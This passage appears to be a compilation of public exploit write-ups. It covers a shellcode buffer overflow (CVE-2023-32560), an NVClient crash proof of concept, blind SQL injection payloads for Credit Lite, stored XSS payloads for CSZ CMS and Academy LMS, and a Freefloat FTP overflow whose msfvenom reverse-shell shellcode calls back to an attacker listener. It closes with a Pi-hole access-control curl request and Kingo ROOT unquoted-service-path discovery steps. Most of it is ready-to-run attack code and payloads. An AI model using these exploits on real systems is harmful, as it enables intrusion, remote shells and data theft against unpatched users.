b"ff4e0875ec68f0b5a256ffd5" shellcode += b"68636d640089e357575731f6" shellcode += b"6a125956e2fd66c744243c01" shellcode += b"018d442410c6004454505656" shellcode += b"5646564e565653566879cc3f" shellcode += b"86ffd589e04e5646ff306808" shellcode += b"871d60ffd5bbe01d2a0a68a6" shellcode += b"95bd9dffd53c067c0a80fbe0" shellcode += b"7505bb4713726f6a0053ffd5" buf = b'90' * 340 buf += b'812b4100' # jmp esp (0x00412b81) buf += b'90909090' buf += b'90909090' buf += shellcode buf += b'41' * 80 buf += b'84d45200' # stack pivot: add esp, 0x00000FA0 ; retn 0x0004 ; (0x0052d484) buf += b'43' * (0x800 - len(buf)) buf2 = b'41' * 0x1000 # Create message payload hdr = [Item(3, "pwned", buf)] payload = [Item(3, "pwned", buf2)] # dummy payload, probabaly not necessary hp_instance = HP(hdr, payload) msg_instance = Msg(hp_instance) # Default port port = 1777 # check for target host argument if len(sys.argv) > 1: host = sys.argv[1] else: print("Usage: python3 CVE-2023-32560.py <host ip>") sys.exit() with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s: s.connect((host, port)) s.sendall(msg_instance.pack()) print("Message sent!") s.close()

# Exploit Title: NVClient v5.0 - Stack Buffer Overflow (DoS) # Discovered by: Ahmet Ümit BAYRAM # Discovered Date: 2023-08-19 # Software Link: http://www.neonguvenlik.com/yuklemeler/yazilim/kst-f919-hd2004.rar # Software Manual: http://download.eyemaxdvr.com/DVST%20ST%20SERIES/CMS/Video%20Surveillance%20Management%20Software(V5.0).pdf # Vulnerability Type: Buffer Overflow Local # Tested On: Windows 10 64bit # Tested Version: 5.0 # Steps to Reproduce: # 1- Run the python script and create exploit.txt file # 2- Open the application and log in # 3- Click the "Config" button in the upper menu # 4- Click the "User" button just below it # 5- Now click the "Add users" button in the lower left # 6- Fill in the Username, Password, and Confirm boxes # 7- Paste the characters from exploit.txt into the Contact box # 8- Click OK and crash! #!/usr/bin/env python3 exploit = 'A' * 846 try: with open("exploit.txt","w") as file: file.write(exploit) print("POC is created") except: print("POC not created")

# Exploit Title: Credit Lite 1.5.4 - SQL Injection # Exploit Author: CraCkEr # Date: 31/07/2023 # Vendor: Hobby-Tech # Vendor Homepage: https://codecanyon.net/item/credit-lite-micro-credit-solutions/39554392 # Software Link: https://credit-lite.appshat.xyz/ # Version: 1.5.4 # Tested on: Windows 10 Pro # Impact: Database Access # CVE: CVE-2023-4407 # CWE: CWE-89 - CWE-74 - CWE-707 ## Description SQL injection attacks can allow unauthorized access to sensitive data, modification of data and crash the application or make it unavailable, leading to lost revenue and damage to a company's reputation. ## Steps to Reproduce: To Catch the POST Request 1. Visit [Account Statement] on this Path: https://website/portal/reports/account_statement 2. Select [Start Date] + [End Date] + [Account Number] and Click on [Filter] Path: /portal/reports/account_statement POST parameter 'date1' is vulnerable to SQL Injection POST parameter 'date2' is vulnerable to SQL Injection ------------------------------------------------------------------------- POST /portal/reports/account_statement HTTP/2 _token=5k2IfXrQ8aueUQzrd5UfilSZzgOC5vyCPGxTTZDK&date1=[SQLi]&date2=[SQLi]&account_number=20005001 ------------------------------------------------------------------------- --- Parameter: date1 (POST) Type: time-based blind Title: MySQL >= 5.0.12 time-based blind (query SLEEP) Payload: _token=5k2IfXrQ8aueUQzrd5UfilSZzgOC5vyCPGxTTZDK&date1=2023-07-31'XOR(SELECT(0)FROM(SELECT(SLEEP(5)))a)XOR'Z&date2=2023-07-31&account_number=20005001 Parameter: date2 (POST) Type: time-based blind Title: MySQL >= 5.0.12 time-based blind (query SLEEP) Payload: _token=5k2IfXrQ8aueUQzrd5UfilSZzgOC5vyCPGxTTZDK&date1=2023-07-31&date2=2023-07-31'XOR(SELECT(0)FROM(SELECT(SLEEP(9)))a)XOR'Z&account_number=20005001 --- [-] Done

# Exploit Title: CSZ CMS 1.3.0 - Stored Cross-Site Scripting ('Photo URL' and 'YouTube URL' ) # Date: 2023/08/18 # CVE: CVE-2023-38910 # Exploit Author: Daniel González # Vendor Homepage: https://www.cszcms.com/ # Software Link: https://github.com/cskaza/cszcms # Version: 1.3.0 # Tested on: CSZ CMS 1.3.0 # Description: # CSZ CMS 1.3.0 is vulnerable to cross-site scripting (XSS), which allows attackers to execute arbitrary web scripts or HTML via a crafted payload entered in the 'Carousel Wiget' section and choosing our carousel widget created above, in 'Photo URL' and 'YouTube URL' plugin. # Steps to reproduce Stored XSS: Go to url http://localhost/admin/carousel. We edit that Carousel that we have created and see that we can inject arbitrary web scripts or HTML into the “Youtube URL” and “Photo URL” fields. We can inject HTML code. With the following payload we can achieve the XSS. Payload: <div><p title="</div><svg/onload=alert(document.domain)>"> #PoC Request: POST http://localhost:8080/admin/carousel/addUrl/3 HTTP/1.1 Host: localhost:8080 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/116.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Content-Length: 137 Origin: http://localhost:8080 Referer: http://localhost:8080/admin/carousel/edit/3 Upgrade-Insecure-Requests: 1 carousel_type=multiimages&photo_url=%3Cdiv%3E%3Cp+title%3D%22%3C%2Fdiv%3E%3Csvg%2Fonload%3Dalert%28document.domain%29%3E%22%3E&submit=Add

# Exploit Title: Academy LMS 6.1 - Arbitrary File Upload # Exploit Author: CraCkEr # Date: 05/08/2023 # Vendor: Creativeitem # Vendor Homepage: https://academylms.net/ # Software Link: https://demo.academylms.net/ # Version: 6.1 # Tested on: Windows 10 Pro # Impact: Allows User to upload files to the web server # CWE: CWE-79 - CWE-74 - CWE-707 ## Description Allows Attacker to upload malicious files onto the server, such as Stored XSS ## Steps to Reproduce: 1. Login as a [Normal User] 2. In [User Dashboard], go to [Profile Settings] on this Path: https://website/dashboard/#/settings 3. Upload any Image into the [avatar] 4. Capture the POST Request with [Burp Proxy Intercept] 5. Edit the file extension to .svg & inject your [Evil-Code] or [Stored XSS] ----------------------------------------------------------- POST /wp-admin/async-upload.php HTTP/2 ----------------------------------------------------------- Content-Disposition: form-data; name="async-upload"; filename="ahacka.svg" Content-Type: image/svg+xml <?xml version="1.0" standalone="no"?> <!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"> <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"> <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/> <script type="text/javascript"> alert("XSS by CraCkEr"); </script> </svg> ----------------------------------------------------------- 6. Send the Request 7. Capture the GET request from [Burp Logger] to get the Path of your Uploaded [Stored-XSS] 8. Access your Uploded Evil file on this Path: https://website/wp-content/uploads/***/**/*****.svg [-] Done

# Exploit Title: CSZ CMS 1.3.0 - Stored Cross-Site Scripting (Plugin 'Gallery') # Date: 2023/08/18 # CVE: CVE-2023-38911 # Exploit Author: Daniel González # Vendor Homepage: https://www.cszcms.com/ # Software Link: https://github.com/cskaza/cszcms # Version: 1.3.0 # Tested on: CSZ CMS 1.3.0 # Description: # CSZ CMS 1.3.0 is affected by a cross-site scripting (XSS) feature that allows attackers to execute arbitrary web scripts or HTML via a crafted payload entered in the 'Gallery' section and choosing our Gallery. previously created, in the 'YouTube URL' field, this input is affected by an XSS. It should be noted that previously when creating a gallery the "Name" field was vulnerable to XSS, but this was resolved in the current version 1.3.0, the vulnerability found affects the "YouTube URL" field within the created gallery. # Steps to reproduce Stored XSS: Go to url http://localhost/admin/plugin/gallery/edit/2. When logging into the panel, we will go to the "Gallery" section and create a Carousel [http://localhost/admin/plugin/gallery], the vulnerable field is located at [http://localhost/admin/plugin/gallery/edit/2] We edit that Gallery that we have created and see that we can inject arbitrary web scripts or HTML into the “Youtube URL”fields. With the following payload we can achieve the XSS Payload: <div><p title="</div><svg/onload=alert(document.domain)>"> #PoC Request: POST http://localhost:8080/admin/plugin/gallery/addYoutube/2 HTTP/1.1 Host: localhost:8080 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/116.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: es-ES,es;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Content-Length: 140 Origin: http://localhost:8080 Referer: http://localhost:8080/admin/plugin/gallery/edit/2 Upgrade-Insecure-Requests: 1 gallery_type=youtubevideos&youtube_url=%3Cdiv%3E%3Cp+title%3D%22%3C%2Fdiv%3E%3Csvg%2Fonload%3Dalert%28document.domain%29%3E%22%3E&submit=Add

#Exploit title: Freefloat FTP Server 1.0 - 'PWD' Remote Buffer Overflow #Date: 08/22/2023 #Exploit Author: Waqas Ahmed Faroouqi (ZEROXINN) #Vendor Homepage: http://www.freefoat.com #Version: 1.0 #Tested on Windows XP SP3 #!/usr/bin/python import socket #Metasploit Shellcode #msfvenom -p windows/shell_reverse_tcp LHOST=192.168.146.134 LPORT=4444 -b '\x00\x0d' #nc -lvp 4444 #Send exploit #offset = 247 #badchars=\x00\x0d\ #return_address=\x3b\x69\x5a\x77 (ole32.dll) payload = ( "\xb8\xf3\x93\x2e\x96\xdb\xca\xd9\x74\x24\xf4\x5b\x31\xc9" "\xb1\x52\x31\x43\x12\x83\xeb\xfc\x03\xb0\x9d\xcc\x63\xca" "\x4a\x92\x8c\x32\x8b\xf3\x05\xd7\xba\x33\x71\x9c\xed\x83" "\xf1\xf0\x01\x6f\x57\xe0\x92\x1d\x70\x07\x12\xab\xa6\x26" "\xa3\x80\x9b\x29\x27\xdb\xcf\x89\x16\x14\x02\xc8\x5f\x49" "\xef\x98\x08\x05\x42\x0c\x3c\x53\x5f\xa7\x0e\x75\xe7\x54" "\xc6\x74\xc6\xcb\x5c\x2f\xc8\xea\xb1\x5b\x41\xf4\xd6\x66" "\x1b\x8f\x2d\x1c\x9a\x59\x7c\xdd\x31\xa4\xb0\x2c\x4b\xe1" "\x77\xcf\x3e\x1b\x84\x72\x39\xd8\xf6\xa8\xcc\xfa\x51\x3a" "\x76\x26\x63\xef\xe1\xad\x6f\x44\x65\xe9\x73\x5b\xaa\x82" "\x88\xd0\x4d\x44\x19\xa2\x69\x40\x41\x70\x13\xd1\x2f\xd7" "\x2c\x01\x90\x88\x88\x4a\x3d\xdc\xa0\x11\x2a\x11\x89\xa9" "\xaa\x3d\x9a\xda\x98\xe2\x30\x74\x91\x6b\x9f\x83\xd6\x41" "\x67\x1b\x29\x6a\x98\x32\xee\x3e\xc8\x2c\xc7\x3e\x83\xac" "\xe8\xea\x04\xfc\x46\x45\xe5\xac\x26\x35\x8d\xa6\xa8\x6a" "\xad\xc9\x62\x03\x44\x30\xe5\xec\x31\xa8\x73\x84\x43\xcc" "\x6a\x09\xcd\x2a\xe6\xa1\x9b\xe5\x9f\x58\x86\x7d\x01\xa4" "\x1c\xf8\x01\x2e\x93\xfd\xcc\xc7\xde\xed\xb9\x27\x95\x4f" "\x6f\x37\x03\xe7\xf3\xaa\xc8\xf7\x7a\xd7\x46\xa0\x2b\x29" "\x9f\x24\xc6\x10\x09\x5a\x1b\xc4\x72\xde\xc0\x35\x7c\xdf" "\x85\x02\x5a\xcf\x53\x8a\xe6\xbb\x0b\xdd\xb0\x15\xea\xb7" "\x72\xcf\xa4\x64\xdd\x87\x31\x47\xde\xd1\x3d\x82\xa8\x3d" "\x8f\x7b\xed\x42\x20\xec\xf9\x3b\x5c\x8c\x06\x96\xe4\xac" "\xe4\x32\x11\x45\xb1\xd7\x98\x08\x42\x02\xde\x34\xc1\xa6" "\x9f\xc2\xd9\xc3\x9a\x8f\x5d\x38\xd7\x80\x0b\x3e\x44\xa0" "\x19") shellcode = 'A' * 247 + "\x3b\x69\x5a\x77" + '\x90' * 10 + payload def main(): ip = '192.168.146.135' port = 21 sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.connect((ip, port)) sock.recv(1024) sock.send('USER anonymous\r\n') sock.recv(1024) sock.send('PASS anonymous\r\n') sock.recv(1024) sock.send('pwd ' + shellcode + '\r\n') sock.close() if __name__ == '__main__': main()

# Exploit Title: AdminLTE PiHole < 5.18 - Broken Access Control # Google Dork: [inurl:admin/scripts/pi-hole/phpqueryads.php](https://vuldb.com/?exploit_googlehack.216554) # Date: 21.12.2022 # Exploit Author: kv1to # Version: Pi-hole v5.14.2; FTL v5.19.2; Web Interface v5.17 # Tested on: Raspbian / Debian # Vendor: https://github.com/pi-hole/AdminLTE/security/advisories/GHSA-6qh8-6rrj-7497 # CVE : CVE-2022-23513 In case of an attack, the threat actor will obtain the ability to perform an unauthorized query for blocked domains on queryads endpoint. ## Proof Of Concept with curl: curl 'http://pi.hole/admin/scripts/pi-hole/php/queryads.php?domain=<searchquery>' ## HTTP requests GET /admin/scripts/pi-hole/php/queryads.php?domain=<searchquery>' HTTP/1.1 HOST: pi.hole Cookie: [..SNIPPED..] [..SNIPPED..] ## HTTP Response HTTP/1.1 200 OK [..SNIPPED..] data: Match found in [..SNIPPED..] data: <domain> data: <domain> data: <domain>

#Exploit Title: Kingo ROOT 1.5.8 - Unquoted Service Path #Date: 8/22/2023 #Exploit Author: Anish Feroz (ZEROXINN) #Vendor Homepage: https://www.kingoapp.com/ #Software Link: https://www.kingoapp.com/android-root/download.htm #Version: 1.5.8.3353 #Tested on: Windows 10 Pro -------------Discovering Unquoted Path-------------- C:\Users\Anish>sc qc KingoSoftService [SC] QueryServiceConfig SUCCESS SERVICE_NAME: KingoSoftService TYPE : 110 WIN32_OWN_PROCESS (interactive) START_TYPE : 2 AUTO_START ERROR_CONTROL : 1 NORMAL BINARY_PATH_NAME : C:\Users\Usman\AppData\Local\Kingosoft\Kingo Root\update_27205\bin\KingoSoftService.exe LOAD_ORDER_GROUP : TAG : 0 DISPLAY_NAME : KingoSoftService DEPENDENCIES : SERVICE_START_NAME : LocalSystem C:\Users\Anish>systeminfo Host Name: DESKTOP-UT7E7CF OS Name: Microsoft Windows 10 Pro OS Version: 10.0.19045 N/A Build 19045